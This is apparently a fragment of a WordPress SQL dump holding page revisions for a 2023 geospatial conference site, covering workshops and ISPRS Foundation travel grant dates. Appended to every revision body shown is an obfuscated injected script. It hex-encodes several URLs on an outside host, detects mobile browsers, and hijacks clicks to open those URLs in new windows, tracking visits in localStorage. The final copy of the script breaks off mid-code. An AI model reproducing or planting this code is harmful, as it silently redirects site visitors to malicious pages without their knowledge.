_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','WORKSHOPS','','inherit','closed','closed','','2372-revision-v1','','','2023-02-04 06:26:52','2023-02-04 06:26:52','',2372,'https://gsw2023.com/?p=3759',0,'revision','',0),
(3760,1,'2023-02-04 06:30:51','2023-02-04 06:30:51','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\" title_font_style=\"font-weight:bold;\"]</p>\n<h5 class=\"three_quarter first\">The <a href=\"http://www.isprs.org/foundation/Default.aspx\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=http://www.isprs.org/foundation/Default.aspx&amp;source=gmail&amp;ust=1675404345029000&amp;usg=AOvVaw2DdHpz5ihNqqTyfv-q8_ze\">ISPRS Foundation</a> provides travel grants to enable young authors, distinguished speakers, and officially designated Delegates, especially from developing countries, to participate in ISPRS sponsored events and in forums promoting international cooperation, advancements and benefits of the P&amp;RS&amp;SI sciences.</h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<ul style=\"font-weight: 400;\">\n<li><strong>Click</strong> <strong><a href=\"http://www.isprs.org/foundation/forms/Travel_Grants.aspx\" data-saferedirecturl=\"https://www.google.com/url?q=http://www.isprs.org/foundation/forms/Travel_Grants.aspx&amp;source=gmail&amp;ust=1675404345029000&amp;usg=AOvVaw19PJGKqfwxDGKh2VuKF0d6\">here</a></strong> <strong>to complete your travel grant application online</strong></li>\n</ul>\n<h5 style=\"font-weight: 400;\"></h5>\n<h4 style=\"font-weight: 400;\"><strong>Important Dates</strong></h4>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul style=\"font-weight: 400;\">\n<li><span style=\"font-size: 12pt;\">Applications for travel grants “live” on TIF website: March 15, 2023</span></li>\n<li><span style=\"font-size: 12pt;\">Deadline for submission of travel grant applications: May 18, 2023</span></li>\n<li><span style=\"font-size: 12pt;\">Decision &amp; notification of successful applicants: June 3, 2023</span></li>\n<li><span style=\"font-size: 12pt;\">Notification of acceptance of travel grant to TIF: July 3, 2023</span></li>\n</ul>\n</li>\n</ul>\n</li>\n</ul>\n<h4 class=\"gap-50\"></h4>\n<h4 id=\"respond\"></h4>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TRAVEL GRANTS','','inherit','closed','closed','','2665-revision-v1','','','2023-02-04 06:30:51','2023-02-04 06:30:51','',2665,'https://gsw2023.com/?p=3760',0,'revision','',0),
(3761,1,'2023-02-04 06:31:50','2023-02-04 06:31:50','[vc_row][vc_column][bsf-info-box icon_size=\"32\" title_font_style=\"font-weight:bold;\"]\r\n<h5 class=\"three_quarter first\">The <a href=\"http://www.isprs.org/foundation/Default.aspx\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=http://www.isprs.org/foundation/Default.aspx&amp;source=gmail&amp;ust=1675404345029000&amp;usg=AOvVaw2DdHpz5ihNqqTyfv-q8_ze\">ISPRS Foundation</a> provides travel grants to enable young authors, distinguished speakers, and officially designated Delegates, especially from developing countries, to participate in ISPRS sponsored events and in forums promoting international cooperation, advancements and benefits of the P&amp;RS&amp;SI sciences.</h5>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<ul style=\"font-weight: 400;\">\r\n 	<li><strong>Click</strong> <strong><a href=\"http://www.isprs.org/foundation/forms/Travel_Grants.aspx\" data-saferedirecturl=\"https://www.google.com/url?q=http://www.isprs.org/foundation/forms/Travel_Grants.aspx&amp;source=gmail&amp;ust=1675404345029000&amp;usg=AOvVaw19PJGKqfwxDGKh2VuKF0d6\">here</a></strong> <strong>to complete your travel grant application online</strong></li>\r\n</ul>\r\n<h5 style=\"font-weight: 400;\"></h5>\r\n<h4 style=\"font-weight: 400;\"><strong>Important Dates</strong></h4>\r\n<ul>\r\n 	<li style=\"list-style-type: none;\">\r\n<ul>\r\n 	<li style=\"list-style-type: none;\">\r\n<ul style=\"font-weight: 400;\">\r\n 	<li><span style=\"font-size: 12pt;\">Applications for travel grants “live” on TIF website: March 15, 2023</span></li>\r\n 	<li><span style=\"font-size: 12pt;\">Deadline for submission of travel grant applications: May 18, 2023</span></li>\r\n 	<li><span style=\"font-size: 12pt;\">Decision &amp; notification of successful applicants: June 3, 2023</span></li>\r\n 	<li><span style=\"font-size: 12pt;\">Notification of acceptance of travel grant to TIF: July 3, 2023</span></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<h4 class=\"gap-50\"></h4>\r\n<h4 id=\"respond\"></h4>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 